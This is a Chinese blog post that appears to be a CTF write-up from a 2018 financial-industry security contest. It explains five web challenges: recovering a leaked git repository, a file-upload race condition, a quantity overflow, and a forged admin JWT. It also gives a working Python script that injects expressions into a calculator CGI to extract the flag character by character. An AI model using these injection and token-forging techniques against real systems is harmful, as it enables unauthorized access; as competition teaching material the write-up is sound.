<!DOCTYPE html>
<html lang=en>
<head><meta name="generator" content="Hexo 3.9.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="babygit从题目名称可以看出这个是git信息泄露的题目。 1https://github.com/BugScanTeam/GitHack 利用git源码恢复工具进行恢复。使用git log命令查看版本信息，然后使用git checkout恢复到上一个版本。 speed第二题是一道条件竞争漏洞的题目，注册后进入后台只有一个文件上传点，上传正常图片可以上传成功，但是上传.php文件会提示上传文件后">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="金融行业网络安全比赛WP">
<meta property="og:url" content="http://naxg.online/2018/08/04/金融行业网络安全比赛WP/index.html">
<meta property="og:site_name" content="NAXG">
<meta property="og:description" content="babygit从题目名称可以看出这个是git信息泄露的题目。 1https://github.com/BugScanTeam/GitHack 利用git源码恢复工具进行恢复。使用git log命令查看版本信息，然后使用git checkout恢复到上一个版本。 speed第二题是一道条件竞争漏洞的题目，注册后进入后台只有一个文件上传点，上传正常图片可以上传成功，但是上传.php文件会提示上传文件后">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://naxg.online/images/pasted-0.png">
<meta property="og:image" content="http://naxg.online/images/pasted-1.png">
<meta property="og:image" content="http://naxg.online/images/pasted-2.png">
<meta property="og:image" content="http://naxg.online/images/pasted-3.png">
<meta property="og:image" content="http://naxg.online/images/pasted-4.png">
<meta property="og:image" content="http://naxg.online/images/pasted-6.png">
<meta property="og:image" content="http://naxg.online/images/pasted-5.png">
<meta property="og:image" content="http://naxg.online/images/pasted-7.png">
<meta property="og:image" content="http://naxg.online/images/pasted-8.png">
<meta property="og:image" content="http://naxg.online/images/pasted-9.png">
<meta property="og:updated_time" content="2019-07-09T13:44:29.368Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="金融行业网络安全比赛WP">
<meta name="twitter:description" content="babygit从题目名称可以看出这个是git信息泄露的题目。 1https://github.com/BugScanTeam/GitHack 利用git源码恢复工具进行恢复。使用git log命令查看版本信息，然后使用git checkout恢复到上一个版本。 speed第二题是一道条件竞争漏洞的题目，注册后进入后台只有一个文件上传点，上传正常图片可以上传成功，但是上传.php文件会提示上传文件后">
<meta name="twitter:image" content="http://naxg.online/images/pasted-0.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>金融行业网络安全比赛WP</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="http://github.com/naxg">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2018/08/05/权限维持小技巧/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2018/07/29/南网2018预选赛WP/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&text=金融行业网络安全比赛WP"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&title=金融行业网络安全比赛WP"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&is_video=false&description=金融行业网络安全比赛WP"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=金融行业网络安全比赛WP&body=Check out this article: http://naxg.online/2018/08/04/金融行业网络安全比赛WP/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&title=金融行业网络安全比赛WP"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&title=金融行业网络安全比赛WP"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&title=金融行业网络安全比赛WP"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&title=金融行业网络安全比赛WP"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&name=金融行业网络安全比赛WP&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#babygit"><span class="toc-number">1.</span> <span class="toc-text">babygit</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#speed"><span class="toc-number">2.</span> <span class="toc-text">speed</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#calculate"><span class="toc-number">3.</span> <span class="toc-text">calculate</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#babyshop"><span class="toc-number">4.</span> <span class="toc-text">babyshop</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Bake-cookies"><span class="toc-number">5.</span> <span class="toc-text">Bake cookies</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        金融行业网络安全比赛WP
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">NAXG</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2018-08-04T13:47:00.000Z" itemprop="datePublished">2018-08-04</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/CTF/">CTF</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="babygit"><a href="#babygit" class="headerlink" title="babygit"></a>babygit</h1><p>从题目名称可以看出这个是git信息泄露的题目。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/BugScanTeam/GitHack</span><br></pre></td></tr></table></figure>
<p>利用git源码恢复工具进行恢复。<br><img src="/images/pasted-0.png" alt><br>使用git log命令查看版本信息，然后使用git checkout恢复到上一个版本。<br><img src="/images/pasted-1.png" alt><br><img src="/images/pasted-2.png" alt></p>
<h1 id="speed"><a href="#speed" class="headerlink" title="speed"></a>speed</h1><p>第二题是一道条件竞争漏洞的题目，注册后进入后台只有一个文件上传点，上传正常图片可以上传成功，但是上传.php文件会提示上传文件后缀非法,已删除所以我们要抢在文件被删除前访问才能获得flag。<br><img src="/images/pasted-3.png" alt></p>
<h1 id="calculate"><a href="#calculate" class="headerlink" title="calculate"></a>calculate</h1><p><a href="https://xz.aliyun.com/t/2456" target="_blank" rel="noopener">https://xz.aliyun.com/t/2456</a><br>修改下源码即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">import requests, re</span><br><span class="line"></span><br><span class="line">def calc(v1, v2, op, s):</span><br><span class="line">    u = &quot;http://54.223.83.192:8888/cgi-bin/calculate.py?&quot;</span><br><span class="line">    payload = dict(value1=v1, value2=v2, op=op, source=s, t=t)</span><br><span class="line">    # print payload</span><br><span class="line">    r = requests.get(u, params=payload)</span><br><span class="line">    # print r.url</span><br><span class="line">    res = re.findall(&quot;&lt;pre&gt;\n&gt;&gt;&gt;&gt;([\s\S]*)\n&gt;&gt;&gt; &lt;\/pre&gt;&quot;,</span><br><span class="line">                     r.content)[0].split(&apos;\n&apos;)[1]</span><br><span class="line">    assert (res != &apos;Invalid&apos;)</span><br><span class="line">    return res == &apos;True&apos;</span><br><span class="line">    # print r.content</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def check(mid):</span><br><span class="line">    s = flag + chr(mid)</span><br><span class="line">    return calc(v1, v2, op, s)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def bin_search(seq=xrange(0x20, 0x80), lo=0, hi=None):</span><br><span class="line">    assert (lo &gt;= 0)</span><br><span class="line">    if hi == None: hi = len(seq)</span><br><span class="line">    while lo &lt; hi:</span><br><span class="line">        mid = (lo + hi) // 2</span><br><span class="line">        # print lo, mid, hi, &quot;\t&quot;,</span><br><span class="line">        if check(seq[mid]): hi = mid</span><br><span class="line">        else: lo = mid + 1</span><br><span class="line">    return seq[lo]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">flag = &apos;&apos;</span><br><span class="line">v1, v2, op, s , t = &apos;x&apos;,&quot;+FLAG&lt;value1+source#&quot;, &quot;+&apos;&quot;, &apos;&apos;,&quot;1a69aa60224a7095ececda5c7c6834fc&quot;</span><br><span class="line"></span><br><span class="line">while (1):</span><br><span class="line">    flag += chr(bin_search() - 1)</span><br><span class="line">    print flag</span><br></pre></td></tr></table></figure>
<h1 id="babyshop"><a href="#babyshop" class="headerlink" title="babyshop"></a>babyshop</h1><p>随便购买点商品，然后在卖出的时候修改商品数量让它溢出。<br><img src="/images/pasted-4.png" alt></p>
<h1 id="Bake-cookies"><a href="#Bake-cookies" class="headerlink" title="Bake cookies"></a>Bake cookies</h1><p>这题从名字可以看出是有关于COOKIE的,从标题看到JWT,JSON Web Token<br><img src="/images/pasted-6.png" alt><br>进去界面猜测账号密码，使用guest/guest登录成功了…弱口令,进去后抓包看COOKIE。<br><img src="/images/pasted-5.png" alt><br>明显是JSON Web Token,访问<a href="https://jwt.io去解密" target="_blank" rel="noopener">https://jwt.io去解密</a><br><img src="/images/pasted-7.png" alt><br>修改为<br>{<br>  “name”: “admin”,<br>  “admin”: “true”<br>}<br>后果COOKIE后提交发现报错信息貌似返回了密钥<br><img src="/images/pasted-8.png" alt><br>填写上密钥重新生成下提交<br><img src="/images/pasted-9.png" alt></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="http://github.com/naxg">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#babygit"><span class="toc-number">1.</span> <span class="toc-text">babygit</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#speed"><span class="toc-number">2.</span> <span class="toc-text">speed</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#calculate"><span class="toc-number">3.</span> <span class="toc-text">calculate</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#babyshop"><span class="toc-number">4.</span> <span class="toc-text">babyshop</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Bake-cookies"><span class="toc-number">5.</span> <span class="toc-text">Bake cookies</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&text=金融行业网络安全比赛WP"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&title=金融行业网络安全比赛WP"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&is_video=false&description=金融行业网络安全比赛WP"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=金融行业网络安全比赛WP&body=Check out this article: http://naxg.online/2018/08/04/金融行业网络安全比赛WP/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&title=金融行业网络安全比赛WP"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&title=金融行业网络安全比赛WP"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&title=金融行业网络安全比赛WP"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&title=金融行业网络安全比赛WP"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://naxg.online/2018/08/04/金融行业网络安全比赛WP/&name=金融行业网络安全比赛WP&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2020 NAXG
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="http://github.com/naxg">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
